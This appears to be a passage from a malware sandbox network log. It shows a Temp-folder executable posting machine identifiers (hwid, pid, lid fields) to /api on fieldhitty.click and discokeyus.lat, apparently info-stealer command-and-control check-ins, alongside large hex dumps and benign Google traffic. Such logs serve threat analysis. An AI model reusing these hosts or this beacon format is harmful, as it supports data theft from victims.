                                                                                                                                                                                                                                                              2024-12-22 01:18:57 UTC1369INData Raw: 63 39 77 39 77 6d 47 46 6f 2f 37 46 34 43 39 47 4d 37 37 47 2b 4d 63 4b 4b 4e 45 4a 53 55 6f 52 52 71 44 53 42 42 71 72 45 75 75 78 33 43 34 51 4d 63 52 68 62 52 50 77 2b 59 69 79 65 41 46 2b 52 34 32 72 77 4d 79 59 6a 59 4b 47 6f 63 4f 52 79 6e 6b 43 65 44 46 61 2f 63 66 68 6a 47 48 75 45 7a 55 34 7a 75 4e 39 55 54 76 55 54 2b 70 52 47 49 72 4e 77 73 63 67 67 68 61 49 71 39 4d 70 64 42 34 76 6b 72 4c 45 5a 71 78 51 4d 50 75 4c 63 66 67 42 66 77 56 4e 61 67 43 4f 6d 74 78 53 31 32 49 45 41 68 79 35 47 53 6c 30 6e 53 37 55 59 51 72 31 36 51 42 32 61 34 74 77 61 70 53 74 68 6b 39 70 67 63 78 5a 44 49 4e 46 70 30 49 57 69 79 70 51 72 4c 45 64 72 6c 4e 78 51 4f 64 74 55 6e 44 35 79 48 45 37 77 33 79 55 58 62 6c 41 79 49 72 61 55 55 38 67 67 4e 45 49 4c 4e 48
                                                                                                                                                                                                                                                              Data Ascii: c9w9wmGFo/7F4C9GM77G+McKKNEJSUoRRqDSBBqrEuux3C4QMcRhbRPw+YiyeAF+R42rwMyYjYKGocORynkCeDFa/cfhjGHuEzU4zuN9UTvUT+pRGIrNwscgghaIq9MpdB4vkrLEZqxQMPuLcfgBfwVNagCOmtxS12IEAhy5GSl0nS7UYQr16QB2a4twapSthk9pgcxZDINFp0IWiypQrLEdrlNxQOdtUnD5yHE7w3yUXblAyIraUU8ggNEILNH
                                                                                                                                                                                                                                                              2024-12-22 01:18:57 UTC1369INData Raw: 56 48 79 67 4f 62 73 55 6e 50 34 79 61 4e 70 45 72 78 43 58 6a 39 52 42 42 6f 4a 51 59 58 7a 54 31 4c 4a 4b 70 41 74 6f 4a 73 2b 56 36 47 46 70 76 37 46 34 44 6a 4b 38 58 73 47 50 6b 63 4f 36 73 4b 4e 57 34 2b 44 52 32 50 42 55 30 75 72 30 79 6a 7a 33 65 6c 54 63 59 5a 6b 72 70 46 79 71 35 6b 6a 65 30 53 74 6b 6c 34 6c 42 4d 78 4b 51 51 47 45 34 45 50 58 6d 71 37 43 62 6d 43 64 4c 73 48 6e 6c 47 61 73 30 72 46 34 53 76 48 35 41 2f 38 48 54 43 72 42 79 68 6b 4e 51 55 52 68 77 4a 46 4a 4b 42 50 71 63 6c 34 73 55 66 48 47 39 66 31 44 38 66 32 61 70 57 71 50 76 45 64 4e 61 70 47 44 32 67 2f 43 78 71 5a 53 46 64 6b 76 51 65 6e 7a 6a 50 76 42 38 6f 59 6c 37 42 46 78 4f 34 74 77 4f 38 4a 38 52 49 31 6f 67 34 30 62 44 55 4a 46 49 49 4f 53 43 32 67 51 72 4c 48 65
                                                                                                                                                                                                                                                              Data Ascii: VHygObsUnP4yaNpErxCXj9RBBoJQYXzT1LJKpAtoJs+V6GFpv7F4DjK8XsGPkcO6sKNW4+DR2PBU0ur0yjz3elTcYZkrpFyq5kje0Stkl4lBMxKQQGE4EPXmq7CbmCdLsHnlGas0rF4SvH5A/8HTCrByhkNQURhwJFJKBPqcl4sUfHG9f1D8f2apWqPvEdNapGD2g/CxqZSFdkvQenzjPvB8oYl7BFxO4twO8J8RI1og40bDUJFIIOSC2gQrLHe
                                                                                                                                                                                                                                                              2024-12-22 01:18:57 UTC1369INData Raw: 6b 6d 61 30 50 33 36 41 7a 6a 65 30 47 74 6b 6c 34 72 41 30 6f 5a 54 38 4d 45 49 6b 41 54 79 53 70 54 4b 62 4a 64 4c 42 42 79 78 6d 61 76 6b 7a 42 36 69 44 66 36 51 48 38 48 44 4c 6c 53 6e 70 73 4b 55 56 46 7a 79 39 45 41 37 52 63 73 74 51 7a 71 41 6e 66 55 5a 43 33 44 35 69 75 4b 63 4c 6a 42 66 34 5a 4e 36 6f 41 4e 47 30 33 43 42 69 41 41 6c 6f 69 71 6b 71 72 7a 58 69 6c 52 38 73 56 6d 37 39 48 79 2b 52 71 67 36 6f 4e 37 6c 46 67 35 54 45 33 5a 44 45 47 43 38 38 58 42 6a 50 6b 51 4b 79 43 4b 2f 64 4c 79 42 47 59 74 30 50 4c 35 69 76 42 35 41 33 7a 47 44 43 74 46 6a 74 76 4f 51 51 54 67 41 6c 4d 4c 36 46 44 70 38 5a 31 75 41 65 49 55 5a 43 6a 44 35 69 75 42 65 72 66 53 4e 63 72 65 4c 70 4b 49 79 73 32 43 56 33 58 53 45 51 70 71 45 2b 76 78 48 71 37 54 63
                                                                                                                                                                                                                                                              Data Ascii: kma0P36Azje0Gtkl4rA0oZT8MEIkATySpTKbJdLBByxmavkzB6iDf6QH8HDLlSnpsKUVFzy9EA7RcstQzqAnfUZC3D5iuKcLjBf4ZN6oANG03CBiAAloiqkqrzXilR8sVm79Hy+Rqg6oN7lFg5TE3ZDEGC88XBjPkQKyCK/dLyBGYt0PL5ivB5A3zGDCtFjtvOQQTgAlML6FDp8Z1uAeIUZCjD5iuBerfSNcreLpKIys2CV3XSEQpqE+vxHq7Tc
                                                                                                                                                                                                                                                              2024-12-22 01:18:57 UTC1369INData Raw: 52 4d 54 74 4c 73 6a 6c 43 2f 63 58 4b 71 49 4e 4b 47 55 38 43 68 57 48 41 55 6b 75 6f 55 71 6d 7a 6e 6d 32 51 4d 67 66 6e 2f 73 42 67 4f 6b 79 6a 62 4a 4b 31 77 45 6a 74 78 49 33 53 6a 77 4b 58 5a 42 47 55 57 71 6a 53 2b 43 61 4d 37 35 56 77 68 79 46 73 6b 6a 4f 34 53 6e 66 36 77 66 39 41 7a 2b 71 41 44 31 6e 4e 77 6f 62 6a 67 31 43 4a 71 4e 43 71 38 31 2f 39 77 6d 47 46 6f 2f 37 46 34 44 41 49 64 37 39 43 66 67 61 4c 72 35 45 4a 53 55 6f 52 52 71 44 53 42 42 71 70 30 79 72 78 6e 4f 37 52 38 49 63 6c 36 6c 41 78 2b 6b 6a 78 76 67 41 38 52 59 7a 72 51 38 31 62 53 4d 4a 45 35 30 4e 57 6a 6a 6b 43 65 44 46 61 2f 63 66 68 69 65 51 71 31 2f 44 72 42 76 62 36 52 7a 39 48 44 54 6c 47 33 52 79 63 51 49 52 7a 31 41 49 4c 4b 74 4f 6f 38 31 79 76 6b 76 4c 46 4a 36
                                                                                                                                                                                                                                                              Data Ascii: RMTtLsjlC/cXKqINKGU8ChWHAUkuoUqmznm2QMgfn/sBgOkyjbJK1wEjtxI3SjwKXZBGUWqjS+CaM75VwhyFskjO4Snf6wf9Az+qAD1nNwobjg1CJqNCq81/9wmGFo/7F4DAId79CfgaLr5EJSUoRRqDSBBqp0yrxnO7R8Icl6lAx+kjxvgA8RYzrQ81bSMJE50NWjjkCeDFa/cfhieQq1/DrBvb6Rz9HDTlG3RycQIRz1AILKtOo81yvkvLFJ6
                                                                                                                                                                                                                                                              2024-12-22 01:18:57 UTC1369INData Raw: 69 48 44 32 41 6e 74 55 53 66 72 48 58 70 73 50 55 56 46 7a 77 74 50 4b 61 56 4e 71 63 35 38 73 45 50 55 47 35 43 70 54 73 48 6c 4a 38 48 71 42 2f 73 62 4f 61 77 4a 4e 6d 59 32 41 68 4b 4b 53 41 5a 71 6f 31 2f 67 6d 6a 4f 57 53 73 30 64 7a 4f 45 50 33 36 41 7a 6a 65 30 47 74 6b 6c 34 70 51 34 2f 59 54 77 47 45 6f 77 61 53 53 79 32 52 36 33 49 59 62 31 4d 77 78 79 61 74 6b 7a 47 36 43 48 42 2b 41 50 32 45 6a 50 6c 53 6e 70 73 4b 55 56 46 7a 79 74 66 50 4b 35 41 72 4e 52 34 74 6b 54 51 48 49 66 37 41 59 44 2f 4c 64 79 71 55 75 41 42 4c 36 49 62 64 48 4a 78 41 68 48 50 55 41 67 73 72 55 47 6e 78 48 32 6c 51 73 41 65 6d 4c 4a 47 78 4f 59 70 7a 65 34 4f 38 52 51 37 71 51 38 39 61 44 34 42 46 49 45 42 52 32 72 71 42 36 66 61 4d 2b 38 48 35 77 71 55 74 30 4b 41
                                                                                                                                                                                                                                                              Data Ascii: iHD2AntUSfrHXpsPUVFzwtPKaVNqc58sEPUG5CpTsHlJ8HqB/sbOawJNmY2AhKKSAZqo1/gmjOWSs0dzOEP36Azje0Gtkl4pQ4/YTwGEowaSSy2R63IYb1MwxyatkzG6CHB+AP2EjPlSnpsKUVFzytfPK5ArNR4tkTQHIf7AYD/LdyqUuABL6IbdHJxAhHPUAgsrUGnxH2lQsAemLJGxOYpze4O8RQ7qQ89aD4BFIEBR2rqB6faM+8H5wqUt0KA
                                                                                                                                                                                                                                                              2024-12-22 01:18:57 UTC1369INData Raw: 4e 4b 75 46 45 2f 76 55 52 69 4b 78 45 4f 43 34 6f 50 58 6d 69 52 52 4b 37 4d 64 4b 45 48 32 53 37 5a 2b 30 44 61 72 6e 4c 30 38 30 72 78 48 58 6a 39 52 43 39 73 4d 51 49 48 6d 51 39 45 4f 36 39 4b 72 4f 42 38 73 46 48 46 48 70 53 71 52 6f 7a 6c 4a 34 32 6b 53 76 45 4a 65 50 31 45 46 57 77 6e 42 6a 4b 4d 47 55 46 71 36 67 65 6e 31 44 50 76 42 2f 68 52 68 62 68 66 77 2b 45 37 38 36 70 53 37 79 39 34 72 68 49 39 65 7a 49 54 46 6f 49 45 57 52 54 6b 48 2f 53 51 49 65 55 56 6c 41 37 58 70 48 43 4f 72 69 75 4e 73 6a 50 76 55 53 37 6c 58 47 67 6c 63 52 64 64 31 30 67 50 4b 62 5a 56 70 73 46 6c 74 41 44 34 4c 37 43 74 52 63 66 2b 4c 64 72 6c 53 72 68 52 4e 2b 56 63 41 79 73 34 41 67 61 65 48 6b 55 36 6f 77 65 66 6a 44 4f 76 42 35 35 52 6f 72 68 42 7a 75 6b 38 33
                                                                                                                                                                                                                                                              Data Ascii: NKuFE/vURiKxEOC4oPXmiRRK7MdKEH2S7Z+0DarnL080rxHXj9RC9sMQIHmQ9EO69KrOB8sFHFHpSqRozlJ42kSvEJeP1EFWwnBjKMGUFq6gen1DPvB/hRhbhfw+E786pS7y94rhI9ezITFoIEWRTkH/SQIeUVlA7XpHCOriuNsjPvUS7lXGglcRdd10gPKbZVpsFltAD4L7CtRcf+LdrlSrhRN+VcAys4AgaeHkU6owefjDOvB55RorhBzuk83
                                                                                                                                                                                                                                                              2024-12-22 01:18:57 UTC1369INData Raw: 48 4f 2b 49 36 42 47 6f 38 43 6c 47 42 41 30 67 74 74 46 47 37 6a 6e 75 30 58 64 77 76 71 5a 42 44 78 75 6b 77 79 75 77 73 31 6c 46 32 35 51 74 36 4d 77 68 46 56 63 38 33 42 6d 71 38 42 2f 69 43 52 72 52 4a 79 42 61 42 71 67 4c 6f 7a 52 44 33 71 43 62 78 42 48 71 52 41 79 70 36 4f 67 67 52 7a 30 59 49 4c 4f 51 66 38 49 77 7a 73 31 61 47 53 63 66 70 46 4a 57 39 66 5a 32 34 46 62 67 49 65 4c 4e 45 59 6a 6c 2f 52 51 2f 50 55 41 68 74 70 31 57 79 78 48 43 68 52 49 45 76 71 5a 78 42 78 2b 38 38 33 66 30 46 79 43 38 74 70 67 6f 30 62 43 63 55 58 63 46 49 52 32 72 38 66 75 43 4b 4d 34 67 4a 68 67 6e 58 34 77 2f 31 37 53 54 44 37 52 7a 6e 58 42 2b 72 41 7a 74 39 49 52 49 53 7a 30 59 49 4c 4f 51 66 38 6f 77 7a 73 31 61 47 53 63 66 70 46 4a 57 39 66 5a 32 34 46 62
                                                                                                                                                                                                                                                              Data Ascii: HO+I6BGo8ClGBA0gttFG7jnu0XdwvqZBDxukwyuws1lF25Qt6MwhFVc83Bmq8B/iCRrRJyBaBqgLozRD3qCbxBHqRAyp6OggRz0YILOQf8Iwzs1aGScfpFJW9fZ24FbgIeLNEYjl/RQ/PUAhtp1WyxHChRIEvqZxBx+883f0FyC8tpgo0bCcUXcFIR2r8fuCKM4gJhgnX4w/17STD7RznXB+rAzt9IRISz0YILOQf8owzs1aGScfpFJW9fZ24Fb
                                                                                                                                                                                                                                                              2024-12-22 01:18:57 UTC1369INData Raw: 52 68 74 68 49 51 67 53 69 45 70 6f 4c 62 4a 45 34 49 77 7a 75 77 65 65 55 5a 61 78 58 38 33 68 4c 59 48 74 45 50 46 52 64 75 55 4b 65 6a 4e 78 42 42 65 66 42 55 63 74 36 45 47 75 7a 44 4f 6f 43 64 39 52 67 66 73 58 6b 36 42 71 33 36 70 53 74 6c 59 37 74 78 59 38 61 43 63 47 57 72 45 32 5a 54 69 6a 56 36 4f 41 51 72 70 44 30 41 53 55 71 30 6a 2b 30 41 66 66 37 52 72 31 55 77 6d 7a 42 7a 70 6c 4e 6b 56 54 7a 78 41 49 63 75 52 71 73 73 56 6a 74 41 65 49 55 5a 76 37 46 34 44 6a 4f 4d 72 36 43 62 6f 57 49 71 4a 45 4a 53 55 6f 52 51 76 50 55 42 74 6b 35 46 58 67 6d 6a 50 77 53 63 73 51 6c 4c 56 4d 30 76 77 73 7a 76 77 4a 73 53 38 47 69 42 59 39 65 7a 4a 48 4c 49 49 4d 58 6a 2b 6e 56 36 66 38 54 5a 70 56 77 51 47 55 2b 57 50 48 34 79 62 7a 31 44 33 6e 46 69 6a
                                                                                                                                                                                                                                                              Data Ascii: RhthIQgSiEpoLbJE4IwzuweeUZaxX83hLYHtEPFRduUKejNxBBefBUct6EGuzDOoCd9RgfsXk6Bq36pStlY7txY8aCcGWrE2ZTijV6OAQrpD0ASUq0j+0Aff7Rr1UwmzBzplNkVTzxAIcuRqssVjtAeIUZv7F4DjOMr6CboWIqJEJSUoRQvPUBtk5FXgmjPwScsQlLVM0vwszvwJsS8GiBY9ezJHLIIMXj+nV6f8TZpVwQGU+WPH4ybz1D3nFij


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              55192.168.2.450250104.21.89.1154437796C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:57 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=FWBTSPSCKBE0B
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8749
                                                                                                                                                                                                                                                              Host: fieldhitty.click
                                                                                                                                                                                                                                                              2024-12-22 01:18:57 UTC8749OUTData Raw: 2d 2d 46 57 42 54 53 50 53 43 4b 42 45 30 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 46 57 42 54 53 50 53 43 4b 42 45 30 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 57 42 54 53 50 53 43 4b 42 45 30 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 76 62 41 72 5a 2d 2d 0d 0a 2d 2d 46 57 42 54 53 50 53 43 4b 42 45 30 42 0d 0a 43
                                                                                                                                                                                                                                                              Data Ascii: --FWBTSPSCKBE0BContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--FWBTSPSCKBE0BContent-Disposition: form-data; name="pid"2--FWBTSPSCKBE0BContent-Disposition: form-data; name="lid"PvbArZ----FWBTSPSCKBE0BC
                                                                                                                                                                                                                                                              2024-12-22 01:18:58 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:58 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=89fag7acb5l07lgrikdgfh2vo0; expires=Wed, 16 Apr 2025 19:05:37 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HPA4l7rGM3pztU9Wv1me1OimTT7Trrvb5uzkbpgD%2Fov%2FF%2B8uZP3GseeOD8oOcP4KA33VG19UV9jV7cuNefBQktI9jECErMaKpFzrMqOLyNZ%2FxDgOx1luBZl%2BQg38z6YsV6i8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c47eafa853308-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1823&min_rtt=1808&rtt_var=709&sent=11&recv=14&lost=0&retrans=0&sent_bytes=2838&recv_bytes=9683&delivery_rate=1509824&cwnd=105&unsent_bytes=0&cid=22465f4802852a84&ts=875&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:18:58 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:18:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              56192.168.2.450253104.21.21.99443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:59 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=7GWK31RGYTO8UDAJHY
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 1401
                                                                                                                                                                                                                                                              Host: discokeyus.lat
                                                                                                                                                                                                                                                              2024-12-22 01:18:59 UTC1401OUTData Raw: 2d 2d 37 47 57 4b 33 31 52 47 59 54 4f 38 55 44 41 4a 48 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 37 47 57 4b 33 31 52 47 59 54 4f 38 55 44 41 4a 48 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 47 57 4b 33 31 52 47 59 54 4f 38 55 44 41 4a 48 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f
                                                                                                                                                                                                                                                              Data Ascii: --7GWK31RGYTO8UDAJHYContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--7GWK31RGYTO8UDAJHYContent-Disposition: form-data; name="pid"1--7GWK31RGYTO8UDAJHYContent-Disposition: form-data; name="lid"PsFKDg--pablo
                                                                                                                                                                                                                                                              2024-12-22 01:18:59 UTC1136INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:59 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=bt112gtjo0bvn47a5pc76di93d; expires=Wed, 16 Apr 2025 19:05:38 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4euVRYNnluiPPb8KEkT%2FUiEmuvTN4YbUD2B%2BhGTEBse1LDVceVpvZYbGFRk6M%2BfTP1r8kQzXFzwj%2BRf4uSgubO6%2BzfXIE5%2BDsjQ6XuGTeKIBend3FS5FGk%2FD7dB6tcK%2B5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c47f44b0241c1-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1709&rtt_var=656&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=2316&delivery_rate=1649717&cwnd=205&unsent_bytes=0&cid=580d30a3f3f0fbf1&ts=682&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:18:59 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:18:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              57192.168.2.450249172.217.19.228443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:59 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                              2024-12-22 01:19:00 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Version: 705503573
                                                                                                                                                                                                                                                              Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:19:00 GMT
                                                                                                                                                                                                                                                              Server: gws
                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              2024-12-22 01:19:00 UTC372INData Raw: 37 63 32 0d 0a 29 5d 7d 27 0a 7b 22 64 64 6c 6a 73 6f 6e 22 3a 7b 22 61 63 63 65 73 73 69 62 69 6c 69 74 79 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 22 2c 22 61 6c 74 5f 74 65 78 74 22 3a 22 53 65 61 73 6f 6e 61 6c 20 48 6f 6c 69 64 61 79 73 20 32 30 32 34 22 2c 22 64 61 72 6b 5f 64 61 74 61 5f 75 72 69 22 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 6c 67 41 41 41 44 36 43 41 4d 41 41 41 42 4b 38 38 6b 69 41 41 41 44 41 46 42 4d 56 45 56 48 63 45 79 51 2b 66 2f 2b 73 5a 4c 70 73 4f 44 36 35 4a 50 39 65 77 37 6c 6e 75 6e 39 34 33 62 33 50 6a 72 79 54 45 44 2b 6b 72 54 36 38 33 6e 2f 4f 44 62 39 6c 72 37 2f 4e 6a 50 39 62 49 44 65 6a 76 7a 2f 6d 4c 7a
                                                                                                                                                                                                                                                              Data Ascii: 7c2)]}'{"ddljson":{"accessibility_description":"","alt_text":"Seasonal Holidays 2024","dark_data_uri":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAlgAAAD6CAMAAABK88kiAAADAFBMVEVHcEyQ+f/+sZLpsOD65JP9ew7lnun943b3PjryTED+krT683n/ODb9lr7/NjP9bIDejvz/mLz
                                                                                                                                                                                                                                                              2024-12-22 01:19:00 UTC1390INData Raw: 5a 5a 6e 6d 59 36 79 32 57 4a 4c 79 59 71 76 2b 57 45 6a 2b 63 61 2f 37 58 71 44 36 4d 69 30 46 37 4f 58 34 4d 69 79 71 53 30 79 63 56 6d 45 4d 38 4f 59 41 37 66 38 41 38 65 55 45 34 66 76 2b 51 45 49 42 37 76 38 41 36 66 76 37 4c 69 66 38 4d 43 6f 44 39 64 2f 39 4e 44 41 4a 38 4e 61 63 53 6b 6b 49 36 75 6f 48 37 65 4b 54 54 30 7a 36 4c 79 66 2b 51 59 48 73 51 44 62 47 50 54 2b 77 51 55 48 64 4e 44 46 69 59 57 50 2b 4c 43 56 68 58 46 78 63 57 6c 70 67 57 6c 30 75 67 50 6f 4c 52 2b 70 62 57 31 70 62 57 6c 74 64 57 31 35 4f 56 6e 35 66 59 46 31 63 58 56 7a 37 4c 43 56 63 58 46 78 46 52 35 6f 4e 51 75 4d 4c 50 65 31 50 58 56 77 77 51 62 51 51 50 76 73 75 65 2f 51 4b 4f 76 44 39 4c 69 63 79 68 76 67 75 67 2f 67 41 62 4f 59 31 68 50 67 45 37 64 55 41 32 2b 6f
